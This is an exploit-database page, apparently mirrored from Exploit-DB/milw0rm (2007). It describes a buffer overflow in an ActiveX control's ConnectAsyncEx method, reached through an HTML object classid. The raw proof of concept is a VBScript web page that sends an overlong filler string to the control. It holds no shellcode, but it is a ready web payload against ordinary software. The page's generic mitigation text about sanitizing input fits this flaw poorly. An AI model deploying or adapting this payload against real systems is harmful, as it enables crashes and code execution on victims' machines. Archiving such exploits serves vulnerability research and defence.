header-logo
Suggest Exploit
vendor:
by:
Unknown
7.5
CVSS
HIGH
Object Classid Exploit
119
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Object Classid Exploit

This exploit takes advantage of a vulnerability in the object classid attribute in HTML. By creating a specially crafted object element with a malicious classid, an attacker can trigger arbitrary code execution. In this specific example, the exploit is using VBScript to create a buffer overflow by manipulating the get_EAX and get_EBX variables. The crafted buffer is then passed to the ConnectAsyncEx method of the target object, leading to code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate any external data used in HTML elements. Additionally, disabling or restricting the execution of scripting languages like VBScript can help prevent exploitation.
Source

Exploit-DB raw data:

<html>
 <object classid='clsid:62FA83F7-20EC-4D62-AC86-BAB705EE1CCD' id='target'></object>
  <script language = 'vbscript'>
   buff = String(3543,"A")
 
   get_EAX = "aaaa"
   get_EBX = "cccc"

   buff2 = String(1440,"B")

   egg = buff + get_EAX + get_EBX + buff2

   target.ConnectAsyncEx egg, 1, "default"
  </script>
</html>

# milw0rm.com [2007-05-08]

Navigation

Suggest Exploit

Services By CQR